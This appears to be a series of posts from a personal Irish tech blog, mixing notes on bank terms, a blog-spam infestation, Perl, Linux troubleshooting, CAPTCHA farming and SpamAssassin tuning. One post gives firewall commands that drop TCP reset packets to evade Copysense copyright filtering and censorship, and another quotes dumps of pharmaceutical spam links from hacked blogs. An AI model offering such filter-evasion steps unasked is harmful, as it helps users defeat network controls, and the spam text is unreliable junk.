5.1 The User authorises AIB to act upon any instruction to debit an Account received through AIB Phone & Internet Banking which has been transmitted using all or part of the Registration Number, PAC and/or any other authentication process which AIB may require to be used in connection with AIB Phone & Internet Banking (including but not limited to a Code Card) without requiring AIB to make any further authentication or enquiry, and all such debits shall constitute a liability of the User. Where the User’s Account is maintained in joint names the liability of the Account Holders shall be joint and several.

5.6 Entries in an Account in respect of Bill Payments, Fund Transfers and Top-Ups shall be prima facie evidence that the transfer or debit represented thereby has been duly authorised and shall be binding on AIB and the User unless and until proved to the contrary.

6 International Payments:

6.9 To the extent permitted by law, and notwithstanding anything to the contrary herein, AIB shall not be liable for, and shall be indemnified in full by the User against, any loss, damage or other liability that the User or AIB may suffer arising out of or in connection with the User’s use of the International Payment services (whether as the sender or receiver of an International Payment) unless such loss, damage or liability is caused by AIB’s fraud, wilful default or negligence. In no circumstances will AIB be liable for any increased costs or expenses, or for any loss of profit, business, contracts, revenues or anticipated savings or for any special, indirect or consequential damage of any nature whatever.

As far as I can tell, basically the AIB have no liability here at all — if a bad guy gets hold of your PIN code and account number, and empties your account, tough luck.

What about Bank of Ireland? It seems they agreed to refund phishing losses in an incident back in 2006. But their 365online Terms and Conditions now say this:

13 Indemnity

13.2 Without prejudice to the generality of Clause 13.1 above, the Bank shall have no liability whatsoever in respect of any loss suffered by the Customer as a result of their breach of Clause 4 [jm: Security/Authentication] by way of knowingly, negligently or recklessly disclosing the Security Devices or any of them.

So it’s all pretty bad news for Irish banking customers. This is pretty bad news — it’s only a matter of time before Irish banks are targeted by a new Banking Trojan, and given that antivirus software has an 80% miss rate these days, even having an up-to-date AV scanner isn’t going to be much help.

My answer? Don’t do internet banking on Windows machines. Simple as that.

IIA’s nasty infection

The Irish Internet Association have a weblog at blog.iia.ie. Back on January 30, this had a Technorati rank of 587893, with 21 inbound links from 14 blogs. That’s about what you’d expect — comparable with Chris Horn’s blog, for instance.

However, fast forward to today, and in the intervening 3 months, it seems to have suddenly shot up to 23,322 inbound links from 550 blogs, giving it a Technorati rank of 6,870.

To put that in perspective, that puts it comfortably in the top 3 in the Irish Blogs Technorati Top 100 — beating Damien Mulley‘s 7,859, but just short of Donncha O’Caoimh‘s stellar 3,434 — and ahead of these other gods of the Irish blogosphere:

Pretty impressive ;)

I was curious, so I went investigating. Of those thousands of inbound links, here’s some samples of the most recent, pasted from the Technorati inbound links page:

barkingmoose

Atacand Free instant online credit report Application credit card Cheap Paxil Does your credit score Household bank credit card application Apr for credit cards Buy Cephalexin? Aciphex Cheap Feldene Zovirax Risperdal Buy Naprosyn, Propecia Credit score codes Poor credit score, Propecia Uk Canada credit card online application Motrin Business credit score Cheap Cialis Jelly 50 Cent Free Ringtones Celexa How to improve my credit score Buy Inderal

4 days ago in barkingmoose by barkingmoose · Authority: 3

The Peninsula’s Edge

Jc penny credit card application Credit cards 1.99 apr ny Affect credit score For credit score American express credit card application Freee credit report Instant fleet 0 apr credit card application? Hydrocodone For low credit scores, No credit instant approval credit cards Annual creditreport.com, Tramadol Credit reporting service Configuration VPN Cheap credit reports. Buy Premarin Carisoprodol Soma Propecia Generic

6 days ago in The Peninsula’s Edge by ricsmith510 · Authority: 9

The Incredible Blog

Prepaid credit card uk Phentrimine Cheap Zovirax: Calan Highest credit score Ambien Valtrex: Ultram 3 credit reporting agencies Credit cards online application Instant approval student credit cards, Apr balance transfer credit cards Free government credit report Transunion free credit report Credit card debt bankruptcy? Propecia Propecia Uk! Correcting credit reports Cialis Uk Credit rating report Buy Synthroid Instant capital one 0 interest credit card application

7 days ago in The Incredible Blog · Authority: 1

Quilters’ Blogs

Annualcreditreport Instantly instant free online credit report Credit cards instant approval Guaranteed instant approval credit cards Lexapro Get my credit score, Card consolidation credit debt financial internet Chevron credit card services. Risperdal Lower credit card debt VPN connection One credit card application Xanax Viagra! Vasotec Diazepam Fix my credit report Credit report bureau. Cialis Soft Tabs! Ativan? Secured loans to increase credit score Cheap Amaryl Cheap Prednisone Alprazolam! Cheap 7 days ago in Quilters’ Blogs · Authority: 5

TPN :: Martial Arts Explorer

Luvox Credit score of Plavix 50 Cent Free Ringtones, Cheap Elavil? Free consumer credit report: Famvir Improve credit score fast Phentermine Online Zovirax Cialis Soft Tabs Apr for credit cards! Ultram Zoloft Credit card deal 0 Deltasone! VPN: Cheap Cardura Credit score rankings! Annual credit report .com Interest rate credit score: Carisoprodol Flagyl ER Online Cialis Soft Tabs Enable VPN 0 apr credit card application Free business credit report Ambien Low 7 days ago in TPN :: Martial Arts Explorer · Authority: 56

Take a look at the ‘inbound links’ list — thousands more just like that.

All of the affected blogs have been hacked to deliver these spam links. They run unpatched versions of WordPress vulnerable to a major security hole. On a casual visit, their pages seem fine — but "View Source", scroll to the bottom, and there are thousands of spam links for drugs, ringtones, cheap credit, etc. on each one, exactly as above, and as described by Kevin Burton in his description of the current epidemic of blog spam.

How did links to the IIA’s blog wind up in this collection?

It’s worth noting that the IIA’s blog does not display the same symptoms — the links aren’t present on their pages.

However, this post provided a good tip as to what has happened. Those infected blog pages point, in turn, to other infected blogs. Somewhere within the IIA’s blog setup, there’s a page inserted by a bad guy, collecting thousands of illicit links from thousands of other infected sites — and sure enough, Irish Web Watcher found it on the IIA’s site — here it is.

Looks like the IIA have a pretty major disinfection job on their hands, and urgently — there’s already a lot of spammy results appearing in the Google index from that site, and the next step after that is usually removal from the index once Google notice it.

Google now include Code Search in normal results

Latest Google curiosity… I hadn’t spotted this before: it appears Google is now including ‘Code Snippet’ results in the results for its normal search. For example, a search for XSLoader gives this result:

xsloader

The results highlighted on the page are for a local variable in a Java module, rather than the much more common XSLoader perl module. I guess ‘Code Snippet’ search is case-sensitive.

RAII in perl

Suppose you have matching start() and end() functions. You want to ensure that each start() is always matched with its corresponding end(), without having to explicitly pepper your code with calls to that function. Here’s a good way to do it in perl — create a guard object:

package Scoper;
sub new {
  my $class = shift; bless({ func => shift },$class);
}
sub DESTROY {
  my $self = shift; $self->{func}->();
}

Here’s an example of its use:

{
  start();
  my $s = Scoper->new(sub { end(); });
  [... do something...]
}
[at this point, end() has been called, even if a die() occurred]

The idea is simply to use DESTROY to perform whatever the cleanup operation is. Once the $s object goes out of scope, it’ll be deleted by perl’s GC, in the process of which, calling $s->DESTROY(). In other words, it’s using the GC for its own ends.

Unlike an eval { } block to catch die()s, this will even be called if exit() or POSIX::exit() is called. (POSIX::_exit(), however, skips DESTROY.)

This is a pretty old C++ pattern — Resource Acquisition Is Initialization. C++’s auto_ptr template class is the best-known example in that language. Here’s a perl.com article on its use in perl, from last year, mostly regarding the CPAN module Object::Destroyer. To be honest, though, it’s 6 lines of code — not sure if that warrants a CPAN module! ;)

RAII is used in SpamAssassin, in the Mail::SpamAssassin::Util::ScopedTimer class.

“What’s New” archaeology

jwz has, incredibly, resurrected home.mcom.com, the WWW site of the Mosaic Communications Corporation, as it was circa Oct 1994.

Edmund Roche-Kelly was kind enough to get in touch and note this link — http://home.mcom.com/home/whatsnew/whats_new_0993.html:

September 3, 1993

IONA Technologies (whose product, Orbix, is the first full and complete implementation of the Object Management Group’s Common Object Request Broker Architecture, or CORBA) is now running a Web server.

An online pamphlet on the Church of the SubGenius is now available.

Guess who was responsible for those two ;)

I was, indeed, running the IONA web server — it was set up in June 1993, and ran Plexus, a HTTP server written in Perl. IONA’s server was somewhere around public web server number 70, world-wide.

The SubGenius pamphlet is still intact, btw, although at a more modern, "hyplan"-less URL these days. It’ll be 15 years old in 6 months… how time flies!

Sharing, not consuming, news

The New York Times yesterday had a great article about modern news consumption:

According to interviews and recent surveys, younger voters tend to be not just consumers of news and current events but conduits as well — sending out e-mailed links and videos to friends and their social networks. And in turn, they rely on friends and online connections for news to come to them. In essence, they are replacing the professional filter — reading The Washington Post, clicking on CNN.com — with a social one.

“There are lots of times where I’ll read an interesting story online and send the URL to 10 friends,” said Lauren Wolfe, 25, the president of College Democrats of America. “I’d rather read an e-mail from a friend with an attached story than search through a newspaper to find the story.”

[Jane Buckingham, the founder of the Intelligence Group, a market research company] recalled conducting a focus group where one of her subjects, a college student, said, “If the news is that important, it will find me.”

In other words, as Techdirt put it, this generation of news readers now focuses on sharing the news, rather than just consuming it — and if you want to share a news story, there’s no point passing on a subscription-only URL that your friends and contacts cannot read.

What newspapers need to do to remain relevant for this generation of news consumers is not to hide their content behind paywalls and registration-required screens. The Guardian got their heads around this a few years back, and have come along in leaps and bounds since then. I wonder if the Irish Times is listening?

converting TAP output to JUnit-style XML

Here’s a perl script that may prove useful: tap-to-junit-xml

NAME

tap-to-junit-xml – convert perl-style TAP test output to JUnit-style XML

SYNOPSIS

tap-to-junit-xml "test suite name" [ outputprefix ] < tap_output.log

DESCRIPTION

Parse test suite output in TAP (Test Anything Protocol) format, and produce XML output in a similar format to that produced by the <junit> ant task. This is useful for consumption by continuous-integration systems like Hudson.

Written in perl, requires TAP::Parser and XML::Generator. It’s based on junit_xml.pl by Matisse Enzer, although pretty much entirely rewritten.

Pulseaudio ate my wifi

I’ve just spent a rather frustrating morning attempting to debug major performance problems with my home wireless network; one of my machines couldn’t associate with the AP at all anymore, and the laptop (which was upstairs in the home office, for a change) was getting horrific, sub-dialup speeds.

I did lots of moving of Linksys APs and tweaking of "txpower" settings, without much in the way of results. Cue tearing hair out etc.

Eventually, I logged into the OpenWRT AP over SSH, ran iftop to see what clients were using the wifi, and saw that right at the top, chewing up all the available bandwidth, was a multicast group called 224.0.0.56. The culprit! There was nothing wrong with the wifi setup after all — the problem was massive bandwidth consumption, crowding out all other traffic.

You see, "pulseaudio", the new Linux sound server, has a very nifty feature — streaming of music to any number of listeners, over RTP. This is great. What’s not so great is that this seems to have magically turned itself on, and was broadcasting UDP traffic over multicast on my wifi network, which didn’t have enough bandwidth to host it.

Here’s how to turn this off without killing "pulseaudio". Start "paman", the PulseAudio Manager, and open the "Devices" tab:

(click on the image to view separately, if it’s partly obscured.)

Select the "RTP Monitor Stream" in the "Sources" list, and open "Properties":

Hit the "Kill" button, and your network is back to normal. Phew.

Another (quicker) way to do this, is using the command-line "pacmd" tool:

echo kill-source-output 0 | pacmd

It’s a mystery where this is coming from, btw. Here’s what "paman" says it came from:

But I don’t seem to have an active ‘module-rtp-send’ line in my configuration:

: jm 98...; grep module-rtp-send /etc/pulse/* /home/jm/.pulse*
/etc/pulse/default.pa:#load-module module-rtp-send source=rtp.monitor

Curious. And irritating.

Update: it turns out there’s another source of configuration — GConf. "paprefs" can be used to examine that, and that’s where the setting had been set, undoubtedly by me hacking about at some stage. :(

more crap from St. Petersburg

Noted with alarm in this comment regarding the horrific privacy-invading adware that is Phorm:

Their programmers are mostly Saint Petersburg-based, home to the Russian Business Network. Their servers are kept only in Saint Petersburg and China, so no ISP customer data is ever stored in the UK. Any personally identifying information they obtain about UK citizens can never be seen or purged using existing UK Data Protection Laws.

St. Petersburg is turning out to be quite a source of online nastiness — the new Boca Raton.

Evading Audible Magic’s Copysense filtering

As I noted on Monday, the Irish branches of several major record companies have brought a case against Eircom, demanding in part that the ISP install Audible Magic’s Copysense anti-filesharing appliances on their network infrastructure.

I thought I’d do a quick bit of research online into how they do their filtering. Here’s what the EFF had to say:

Audible Magic’s technology can easily be defeated by using one-time session key encryption (e.g., SSL) or by modifying the behavior of the network stack to ignore RST packets.

It’s interesting to see that they used RST packets — this is the same mechanism used by the "Great Firewall of China" to censor the internet:

the keyword detection is not actually being done in large routers on the borders of the Chinese networks, but in nearby subsidiary machines. When these machines detect the keyword, they do not actually prevent the packet containing the keyword from passing through the main router (this would be horribly complicated to achieve and still allow the router to run at the necessary speed). Instead, these subsiduary machines generate a series of TCP reset packets, which are sent to each end of the connection. When the resets arrive, the end-points assume they are genuine requests from the other end to close the connection — and obey. Hence the censorship occurs.

But there’s a very easy way to avoid this, according to that blog post:

However, because the original packets are passed through the firewall unscathed, if both of the endpoints were to completely ignore the firewall’s reset packets, then the connection will proceed unhindered! We’ve done some real experiments on this — and it works just fine!! Think of it as the Harry Potter approach to the Great Firewall — just shut your eyes and walk onto Platform 9¾.

Clayton, Murdoch, and Watson’s paper on this technique provides the Linux and FreeBSD firewall commands they used to do this. Here’s Linux:

   iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP

For FreeBSD, the command is:

   ipfw add 1000 drop tcp from any to me tcpflags rst in

So assuming Copysense haven’t changed their approach yet, it’s trivial to block Copysense’s filtering, if both ends are running Linux or BSD. I predict if Copysense becomes widespread, someone will patch Windows TCP to do the same.

I love Audible Magic’s response:

The current appliance happens to use the TCP Reset to accomplish this today. There are many other technical methods of blocking transfers. Again, we have strategies to deal with them should they ever prove necessary. This is why we recommend our customers purchase a software support agreement which provides for these enhancements that keep their purchase up-to-date and protect their investment.

in other words, "hey customers! if you don’t have a support contract, you’re shit out of luck when the p2p guys get around our filters!" Nice. ;)

Vim hanging while running VMWare: fixed

I’ve just fixed a bug on my linux desktop which had been annoying me for a while. Since there seems to be little online written about it, here’s a blog post to help future Googlers.

Here’s the symptoms: while you’re running VMWare, your Vim editing sessions freeze up for 20 seconds or so, roughly every 5 minutes. The editor is entirely hung.

If you strace -p the process ID before the hang occurs, you’ll see something like this:

select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
_llseek(7, 4096, [4096], SEEK_SET)      = 0
write(7, "tp\21\0\377\0\0\0\2\0\0\0|\0\0\0\1\0\0\0\1\0\0\0\6\0\0"..., 4096) = 4096
ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost -isig -icanon -echo ...}) = 0
select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
_llseek(7, 20480, [20480], SEEK_SET)    = 0
write(7, "ad\0\0\245\4\0\0\341\5\0\0\0\20\0\0J\0\0\0\250\17\0\0\247"..., 4096) = 4096
ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost -isig -icanon -echo ...}) = 0
select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
fsync(

In other words, the hung process is sitting in an fsync() call, attempting to flush changed data for the current file to disk.

Investigation threw up the following: a kerneltrap thread about disk activity, poor responsiveness with Firefox 3.0b3 on linux, and a VIM bug report regarding this feature interfering with laptop-mode and spun-down hard disks.

VMWare must be issuing lots of unsynced I/O, so when Vim issues its fsync() or sync() call, it needs to wait for the VMWare I/O to complete before it can return — even though the machine is otherwise idle. A bit of a Linux kernel (or specifically, ext3) misfeature, it seems.

Synthesising details from those threads comes up with this fix: edit your ~/.vimrc and add the following lines —

set swapsync=
set nofsync

This will inhibit use of both fsync() and sync() by Vim, and the problem is avoided nicely.

Update: one of the Firefox developers discusses how this affects FF 3.0.

Irish ISPs in record company crosshairs

RTE reports that 4 record companies, EMI, Sony BMG, Universal Music and Warner Music, have brought a High Court action to compel Eircom — Ireland’s largest ISP — to prevent its networks being used for the illegal downloading of music:

Willie Kavanagh, Managing Director of EMI Ireland and chairman of IRMA, said because of illegal downloading and other factors, the Irish music industry was experiencing a "dramatic and accelerating decline" in income. He said sales in the Irish market dropped 30% in the six years up to 2007.

EMI and the other companies are challenging Eircom’s refusal to use filtering technology or other measures to voluntarily block or filter illegally downloaded material. Last October Eircom told the companies it was not in a position to use the filtering software.

(I wonder if those dropping sales in the Irish market comprise only CDs sold by Irish shops? 2001 to 2007 is also the time period when physical sales have given way to online shopping on a gigantic scale, especially for music.)

The Irish Times coverage includes another interesting factoid, which appears in a lot of press regarding this case:

Latest figures available, for 2006, indicate that 20 billion music files were illegally downloaded worldwide that year. The music industry estimates that for every single legal download, there are 20 illegal ones.

A little research reveals that that figure comes from the IFPI Digital Music Report 2008. I’d have a totally different take on it, however. In my opinion, the figure is probably correct, but not for the reasons the IFPI want them to be. There are a number of factors:

There’s more commentary on the 20-to-1 figure here.

The IFPI Digital Music Report 2008 also notes:

“2007 was the year ISP responsibility started to become an accepted principle. 2008 must be the year it becomes reality”

Governments are starting to accept that Internet Service Providers (ISPs) should take a far bigger role in protecting music on the internet, but urgent action is needed to translate this into reality, a new report from the international music industry says today.

ISP cooperation, via systematic disconnection of infringers and the use of filtering technologies, is the most effective way copyright theft can be controlled. Independent estimates say up to 80 per cent of ISP traffic comprises distribution of copyright-infringing files.

The IFPI Digital Music Report 2008 points to French President Sarkozy’s November 2007 plan for ISP cooperation in fighting piracy as a groundbreaking example internationally. Momentum is also gathering in the UK, Sweden and Belgium. The report calls for legislative action by the European Union and other governments where existing discussions between the music industry and record companies fail to progress.

So it seems Ireland is the vanguard of an international effort by IFPI members to force ISPs to install filtering, worldwide. It seems the same happened in Belgium last year — and I reckon there’ll be similar cases elsewhere soon.

Either way, I doubt this will be good for Irish internet users.

(PS: while I’m talking about buying MP3s online — a quick plug for 7digital. Last time I used them, I had a pretty crappy experience, but the situation is a lot better nowadays. They now have a great website that works perfectly in Firefox on Linux; they sell brand new releases like the Hercules and Love Affair album as 320kbps DRM-free MP3s; they support PayPal payments; and downloads are fast and simple — right click, "Save As". hooray!)

Some other blog coverage: Lex Ferenda with some details about the legal situation, and Jim Carroll.

Update: EMI Ireland seem to be singing from a different hymn-sheet than their head office… interesting.

Update 2: I’ve taken a look at the Copysense filtering technology, and how it can be evaded.

Announcing IrishPulse

As I previously threatened, I’ve gone ahead and created a "Microplanet" for Irish twitterers, similar to Portland’s Pulse of PDX — an aggregator of the "stream of consciousness" that comes out of our local Twitter community: IrishPulse.

Here’s what you can do:

Add yourself: if you’re an Irish Twitter user, follow the user ‘irishpulse’. This will add you to the sources list.

Publicise it: feel free to pass on the URL to other Irish Twitter users, and blog about it.

Read it: bookmark and take a look now and again!

In terms of implementation, it’s just a (slightly patched) copy of Venus and a perl script using Net::Twitter to generate an OPML file of the Twitter followers. Here’s the source. I’d love to see more "Pulse" sites using this…

Google’s CAPTCHA – not entirely broken after all?

A couple of weeks ago, WebSense posted this article with details of a spammer’s attack on Google’s CAPTCHA puzzle, using web services running on two centralized servers:

[…] It is observed that two separate hosts active on same domain are contacted during the entire process. These two hosts work collaboratively during the CAPTCHA break process. […]

Why [use 2 hosts]? Because of variations included in the Google CAPTCHA image, chances are that host 1 may fail breaking the code. Hence, the spammers have a backup or second CAPTCHA-learning host 2 that tries to learn and break the CAPTCHA code. However, it is possible that spammers also use these two hosts to check the efficiency and accuracy of both hosts involved in breaking one CAPTCHA code at a time, with the ultimate goal of having a successful CAPTCHA breaking process.

To be specific, host 1 has a similar concept that was used to attack Live mail CAPTCHA. This involved extracting an image from a victim’s machine in the form of a bitmap file, bearing BM.. file headers and breaking the code. Host 2 uses an entirely different concept wherein the CAPTCHA image is broken into segments and then sent as a portable image / graphic file bearing PV..X file headers as requests. […]

While it doesn’t say as such, some have read the post to mean that Google’s CAPTCHA has been solved algorithmically. I’m pretty sure this isn’t the case. Here’s why.

Firstly, the FAQ text that appears on "host 1" (thanks Alex for the improved translation!):

img

FAQ

If you cannot recognize the image or if it doesn’t load (a black or empty image gets displayed), just press Enter.

Whatever happens, do not enter random characters!!!

If there is a delay in loading images, exit from your account, refresh the page, and log in again.

The system was tested in the following browsers: Internet Explorer Mozilla Firefox

Before each payment, recognized images are checked by the admin. We pay only for correctly recognized images!!!

Payment is made once per 24 hours. The minimum payment amount is $3. To request payment, send your request to the admin by ICQ. If the admin is free, your request will be processed within 10-15 minutes, and if he is busy, it will be processed as soon as possible.

If you have any problems (questions), ICQ the admin.

That reads to me a lot like instructions to human "CAPTCHA farmers", working as a distributed team via a web interface.

Secondly, take a look at the timestamps in this packet trace:

img2

The interesting point is that there’s a 40-second gap between the invocation on "Captcha breaking host 1" and the invocation on "Captcha breaking host 2". There is then a short gap of 5 seconds before the invocations occur on the Gmail websites.

Here’s my theory: "host 1" is a web service gateway, proxying for a farm of human CAPTCHA solvers. "host 2", however, is an algorithm-driven server, with no humans involved. A human may take 40 seconds to solve a CAPTCHA, but pure code should be a lot speedier.

Interesting to note that they’re running both systems in parallel, on the same data. By doing this, the attackers can

  1. collect training data for a machine-learning algorithm (this is implied by the ‘do not enter random characters!’ warning from the FAQ — they don’t want useless training data)

  2. collect test cases for test-driven development of improvements to the algorithm

  3. measure success/failure rates of their algorithms, "live", as the attack progresses

Worth noting this, too:

Observation*: On average, only 1 in every 5 CAPTCHA breaking requests are successfully including both algorithms used by the bot, approximating a success rate of 20%. The second algorithm (segmentation) has very poor performance that sometimes totally fails and returns garbage or incorrect answers.

So their algorithm is unreliable, and hasn’t yet caught up with the human farmers. Good news for Google — and for the CAPTCHA farmers of Romania ;)

Update: here’s the NYTimes’ take, with broadly agreeing comments from Brad Taylor of Google. (The Register coverage is off-base, however.)

On the effects of lowering your SpamAssassin threshold

So I was chatting to Danny O’Brien a few days ago. He noted that he’d reduced his Spamassassin "this is spam" threshold from the default 5.0 points to 3.7, and was wondering what that meant:

I know what it means in raw technical terms — spamassassin now marks anything >3.7 as spam, as opposed to the default of five. But given the genetic algorithm way that SA calculates the rule scoring, what does lowering the score mean? That I’m more confident that stuff marked ham is stuffed marked ham than the average person? That my bayesian scoring is now really good?

Do people usually do this without harmful side-effects? What does it mean about them if they do it?

Does it make me a good person? Will I smell of ham? These are the things that keep me awake at night.

It’s a good question! Here’s what I responded with — it occurs to me that this is probably quite widely speculated about, so let’s blog it here, too.

As you tweak the threshold, it gets more or less aggressive.

By default, we target a false positive rate of less than 0.1% — that means 1 FP, a ham marked as spam incorrectly, per 1000 ham messages. Last time the scores were generated, we ran our usual accuracy estimation tests, and got a false positive rate of 0.06% (1 in 1667 hams) and a false negative rate of 1.49% (1 in 67 spams) for the default threshold of 5.0 points. That’s assuming you’re using network tests (you should be) and have Bayes training (this is generally the case after running for a few weeks with autolearning on).

If you lower the threshold, then, that trades off the false negatives (reducing them — less spam getting past) in exchange for more false positives (hams getting caught). In those tests, here’s some figures for other thresholds:

SUMMARY for threshold 3.0: False positives: 290 0.43% False negatives: 313 0.26%

SUMMARY for threshold 4.0: False positives: 104 0.15% False negatives: 1084 0.91%

SUMMARY for threshold 4.5: False positives: 68 0.10% False negatives: 1345 1.13%

so you can see FPs rise quite quickly as the threshold drops. At 4.0 points, the nearest to 3.7, 1 in 666 ham messages (0.15%) will be marked incorrectly as spam. That’s nearly 3 times as many FPs as the default setting’s value (0.06%). On the other hand, only 1 in 109 spams will be mis-filed.

Here’s the reports from the last release, with all those figures for different thresholds — should be useful for figuring out the likelihoods!

In fact, let’s get some graphs from that report. Here is a graph of false positives (in orange) vs false negatives (in blue) as the threshold changes…

and, to illustrate the details a little better, zoom in to the area between 0% and 1%…

You can see that the default threshold of 5.0 isn’t where the FP% and FN% rates meet; instead, it’s got a much lower FP% rate than FN%. This is because we consider FPs to be much more dangerous than missed spams, so we try to avoid them to a higher degree.

An alternative, more standardized way to display this info is as a Receiver Operating Characteristic curve, which is basically a plot of the true positive rate vs false positives, on a scale from 0 to 1.

Here’s the SpamAssassin ROC curve:

More usefully, here’s the ROC curve zoomed in nearer the "perfect accuracy" top-left corner:

Unfortunately, this type of graph isn’t much use for picking a SpamAssassin threshold. GNUplot doesn’t allow individual points to be marked with the value from a certain column, otherwise this would be much more useful, since we’d be able to tell which threshold value corresponds to each point. C’est la vie!

Update:: this is possible with GNUplot 4.2 onwards, it seems. great news! Hat tip to Philipp K Janert for the advice. here are updated graphs using this feature:

(GNUplot commands to render these graphs are here.)

Update again: much better interactive Flash graphs here.

Microplanets

Intriguing! Via Glynn Moody comes an interesting new site, Pulse of Open Source:

To highlight open source activity on Twitter, I have launched a new web application today called The Pulse of Open Source. This is the stream of collective consciousness from the open source community on Twitter. You can follow this stream by simply bookmarking the site and visiting regularly or by adding the RSS feed to your feed reader. You can also create a Twitter account and add the individuals you’d like to follow to your own Twitter friends list if you’d prefer. There is also a mobile version of the site for on-the-go viewing.

I’m not entirely convinced it makes sense — the "open source community" is a pretty wide and amorphous concept, covering "enterprisey" types like Iona, to conference organisers, to web standards guys to GNOME developers. That’s a wide range.

However, that site links to the original, and a version which resonates better: PulseOfPDX.com, ‘the stream of Portland’s collective consciousness‘. Basically, this is a local syndication site, with microblogging from a community of local Twitterers. Similar to the "Planet" concept, which aggregates posts from multiple weblogs into a new ‘river of news’ combined feed, as seen on Planet Antispam, Planet Perl, Planet.journals.ie, but for off-the-cuff Twitter microblog comments. It’s a microplanet, to coin a phrase.

I think I might set up one of these for Ireland… what a great idea!

Update: Ted Leung posted about this today as well, I see, linking to this call for an "out-of-the-box" Twitter aggregator:

In theory, this whole pulse idea could be packaged up to be as easily deployable as “planet” sites. Here, “pulse” is the operational brand-name of aggregating Twitter accounts, where as “planet” is the tried and true operational brand-name of aggregating blogs.

I think I still prefer "microplanet" ;)

Update 2: check out IrishPulse!

Bea picture of the week


Another super-cute photo of Bea, from the latest batch. Nowadays, my photos are all-Bea, all of the time…


Plug plug

It’s been a while since I’ve posted about good shopping experiences I’ve had. Here’s a couple:

SoleTrader.co.uk: I’m a terrible shopper. I hate shops, I always wind up having to visit them at their busiest times on the weekend, and the last time I tried to go shopping for a new pair of shoes, I got caught in torrential rain, fell over and broke my thumb instead. seriously. So feck that.

Instead, I resolved to buy them online, and that I did — from SoleTrader. They had a great range of trainers, I found what I was after, the price was grand, and delivery on time. Shoes are always the same size — their sizes are standardised, after all — so naturally they fit fine. All in all, it worked out great.

Be Organic: these guys operate in North Dublin, delivering bags of organic fruit and vegetables to your door, weekly. We get the Essential Fruit Bag and the Mini Box, with a bi-weekly bag of spuds on top, for EUR 32 per week. The quality of the food is absolutely fantastic, there’s never any spoilage or wilting, and it’s always fresh and delicious. Compared to supermarket fare, it’s leagues ahead. They’ve also been grand and flexible when we need to tweak the order slightly — for example we have a veto on celery, and that’s not an issue at all. The only problem would be that they’ve recently increased their prices… but unfortunately that seems to be a general problem in Ireland these days!

vote for Dustin on Saturday

A friend of a friend writes:

Unless you are pretty good at avoiding the media, you will be aware that Dustin the Turkey has been chosen as one of six finalists for RTE’s Eurosong, the winner of which will go on to represent Ireland in the Eurovision Song Contest in Serbia in May.

What you may not be aware of is that I wrote and recorded the song with him and need your votes to help get me to Serbia!!!

The TV show will be broadcast live on RTE this Saturday Feb 23rd, at 7pm. It is a televote (a la X-factor format), so get your mobile phones ready. The results are at 9:45pm.

The song, Irlande Douze Points, is a parody on the current types of songs, acts and block-voting in the Eurovision. It may make your ears bleed a bit, you may ask yourself why, but what the hell, send someone you know to the final!!!

Apparently, Dustin urges the contest judges to "give douze points to Ireland, for its lowlands and its highlands, for Terry Wogan’s wig and Bono’s leather pants. We brought you Guinness and Westlife, 800-years of war and strife, but we all apologise for Riverdance."

Check out the outraged reactions from Ireland’s past Eurovision "winners":

Frank McNamara, who wrote two of the Irish Eurovision winners, asked whether RTE, the state broadcaster that selected the six acts, was “giving two fingers” to Irish ‘song’writers. “I think it is absolutely disgraceful."

Shay Healy, who wrote Johnny Logan’s Eurovision hit What’s Another Year?, wondered “how any bunch of grown-ups could come up with this as a solution”

Phil Coulter thought that Eurovision was going “down the tubes”.

The choice on Saturday is between a turkey puppet taking the piss in a Northside accent, and such po-faced "serious pop" mawkfests as ‘"Double Cross My Heart" performed by Donal Skehan’ and ‘"Time to Rise" performed by Maya’. snore. You know it’s got to be the turkey.

Here’s the official Bebo page, and the Facebook group — and here’s the song itself:

Update: actually, here’s another, higher quality clip — with an entirely different song! Let’s hope this is the one…

Update 2: he won. Dana and the other professional Eurovision types have been chewing wasps, it’s hilarious!

A historical DailyWTF moment

Today, in work, we wound up discussing this classic DailyWTF.com article — "Remember, the enterprisocity of an application is directly proportionate to the number of constants defined":

public class SqlWords
{
  public const string SELECT = " SELECT ";
  public const string TOP = " TOP ";
  public const string DISTINCT = " DISTINCT ";
  /* etc. */
}

public class SqlQueries
{
  public const string SELECT_ACTIVE_PRODCUTS =
    SqlWords.SELECT +
    SqlWords.STAR +
    SqlWords.FROM +
    SqlTables.PRODUCTS +
    SqlWords.WHERE +
    SqlColumns.PRODUCTS_ISACTIVE +
    SqlWords.EQUALS +
    SqlMisc.NUMBERS_ONE;
  /* etc. */
}

This made me recall the legendary source code for the original Bourne shell, in Version 7 Unix. As this article notes:

Steve Bourne, at Bell Labs, worked on his version of shell starting from 1974 and this shell was released in 1978 as Bourne shell. Steve previously was involved with the development of Algol-68 compiler and he transferred general approach and some syntax sugar to his new project.

"Some syntax sugar" is an understatement. Here’s an example, from cmd.c:

LOCAL REGPTR    syncase(esym)
        REG INT esym;
{
        skipnl();
        IF wdval==esym
        THEN    return(0);
        ELSE    REG REGPTR      r=getstak(REGTYPE);
                r->regptr=0;
                LOOP wdarg->argnxt=r->regptr;
                     r->regptr=wdarg;
                     IF wdval ORF ( word()!=')' ANDF wdval!='|' )
                     THEN synbad();
                     FI
                     IF wdval=='|'
                     THEN word();
                     ELSE break;
                     FI
                POOL
                r->regcom=cmd(0,NLFLG|MTFLG);
                IF wdval==ECSYM
                THEN    r->regnxt=syncase(esym);
                ELSE    chksym(esym);
                        r->regnxt=0;
                FI
                return(r);
        FI
}

Here are the #define macros Bourne used to "Algolify" the C compiler, in mac.h:

/*
 *      UNIX shell
 *
 *      S. R. Bourne
 *      Bell Telephone Laboratories
 *
 */

#define LOCAL   static
#define PROC    extern
#define TYPE    typedef
#define STRUCT  TYPE struct
#define UNION   TYPE union
#define REG     register

#define IF      if(
#define THEN    ){
#define ELSE    } else {
#define ELIF    } else if (
#define FI      ;}

#define BEGIN   {
#define END     }
#define SWITCH  switch(
#define IN      ){
#define ENDSW   }
#define FOR     for(
#define WHILE   while(
#define DO      ){
#define OD      ;}
#define REP     do{
#define PER     }while(
#define DONE    );
#define LOOP    for(;;){
#define POOL    }

